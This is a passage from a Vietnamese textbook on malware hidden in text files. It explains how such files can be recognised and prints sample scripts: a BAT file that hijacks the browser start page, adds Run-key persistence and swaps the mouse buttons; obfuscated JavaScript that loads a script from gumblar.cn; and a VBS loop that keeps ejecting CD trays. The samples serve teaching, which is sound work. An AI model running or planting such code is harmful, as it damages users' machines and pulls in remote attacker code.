Dấu hiệu nhận dạng các tập văn bản 7-bit có thể nhiễm virus là: - Dữ liệu byte (32-127)
- Chứa các từ khóa của các ngơn ngữ lập trình tích hợp sẵn trong hệ thống
(Java Script, VB Script, HTML Application, Command Interpreter…).
Dưới đây là một dạng malware nằm trong file bat. Nội dung như sau:
41
REG ADD HKCU\Software\Microsoft\InternetExplorer\Main /v StartPage /t REG_SZ /dhttp://pcgyaan.wordpress.com /f
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v winlogon /t REG_SZ /d %windir%\force.exe /f
copy /y Wallpaper1.bmp ”%USERPROFILE%\Local Settings\Application Data\Microsoft” RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
RUNDLL32.exe USER32.DLL,SwapMouseButton rename song.exe force.exe
move /y force.exe “%windir%” del /Q force.bat
del /Q wallpaper.bmp
Mẫu mã độc trong định dạng Java js
<script language=javascript><!-- (function(){var xXx='%';var ZjWrI='_76_61r_20_61_3d_22_53criptE_6eg_69ne_22_2cb_3d_22V_65r_73io_6e()+_22_2cj_3d_22_ 22_2cu_3d_6eav_69_67a_74or_2e_75_73er_41g_65nt_3bif(_28u_2e_69ndexOf_28_22W_69n_22)_3 e0)_26_26_28_75_2ein_64exOf(_22N_54_20_36_22)_3c0_29_26_26(do_63ument_2ecook_69_65_2 ei_6ed_65xOf(_22_6die_6b_3d_31_22_29_3c0_29_26_26(t_79p_65of(z_72_76_7at_73)_21_3dt_79p eof(_22A_22)))_7bzr_76zts_3d_22A_22_3b_65v_61l(_22if(wi_6edow_2e_22+a+_22)_6a_3dj+_22+a +_22_4d_61jo_72_22_2bb_2ba+_22Minor_22+b+a+_22_42_75ild_22+b+_22_6a_3b_22)_3bd_6fcu ment_2e_77r_69te_28_22_3cscript_20sr_63_3d_2f_2fgumblar_2e_63n_2f_72_73s_2f_3fi_64_3d_22 +j_2b_22_3e_3c_5c_2fscript_3e_22_29_3b_7d';var xtS=ZjWrI.replace(/_/g,xXx);eval(unescape(xtS))})(); --></script> Mẫu mã độc trong định dạng VBS
Set oWMP = CreateObject("WMPlayer.OCX.7") Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 100 loop
42
2.1.2 Định dạng trong tệp tin chương trình
Các tập tin chương trình (program file), cịn gọi là ứng dụng (application) hay phần mềm (software), được biên dịch thành các tổ chức file thực thi trong môi trường của hệ điều hành. Đối với DOS/Windows, ngồi hai loại tập tin chương trình chính là COM và EXE cịn có các tổ chức thực thi khác như SYS, DLL, CPL, SCR, OCX… Trong quá trình phát triển, Microsoft đã sử dụng nhiều định dạng thực thi phức tạp. Khi nạp vào bộ nhớ, tập tin chương trình sẽ được hệ điều hành thực thi, không quan tâm nguồn gốc và mức độ nguy hiểm của các lệnh này. Do vậy, các tập tin chương trình là một trong những kẽ hở bảo mật quan trọng của hệ thống.